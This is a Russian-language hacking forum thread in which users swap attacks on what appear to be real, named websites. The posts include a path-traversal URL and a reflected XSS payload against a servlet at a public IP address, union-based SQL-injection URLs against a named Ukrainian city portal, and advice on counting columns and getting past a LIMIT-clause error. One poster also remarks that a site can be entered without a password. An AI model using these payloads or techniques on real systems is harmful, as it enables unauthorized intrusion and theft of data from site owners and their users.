diehard, хэши - это хорошо =) Там, кстати, можно и без пароля зайти)) ЗЫ. Алгоритм хэширования - MySQL4 aka OLD_PASSWORD в пятом мускуле
Можно делать листинг путем команд в переменной пример http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/../
в принципе да. держи еще xss пассив =) http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/Service_Online.jsp&Type=%3Cscript%3Ealert(%22111%22)%3C/script%3E
http://сайт/id=0+union+select+1/* Выводит (страница 0 union select 1/* из 1) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16 Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/* Как можно заюзать эту ошибку?
Да уже все перепробовал... Мне интересно почему висит вот эта ошибка постоянно независимо от того что вбивать в http://сайт/id=/* You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16
а ещё вот такой +--+ и проверь на раскрытые скобки в запросе. Попробуй проанализировать, что там фильтруется
Помогите SQL-inj Вот кол-во столбцов вроде подобрал PHP: http://moy-gorod.com.ua/cat.phtml?curcat=-999'+order+by+21/* но так нехочет: PHP: http://moy-gorod.com.ua/cat.phtml?curcat=-999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
у меня была такая же трабла с запросом. Когда подставляешь ` (обратную кавычку) то результат меняется...
Без разницы какую кавычку ставить ... Важно изменить так чтобы страница имела отрицательное значение.
Скорее всего одна переменная идёт в два разных запроса с разной структурой, т.е. разное количество столбцов Бред. Значение из переменной подставляется в limit, а т.к. в лимит нельзя вставлять выражения, то ты в пролёте. Надо чтобы значение не существовало
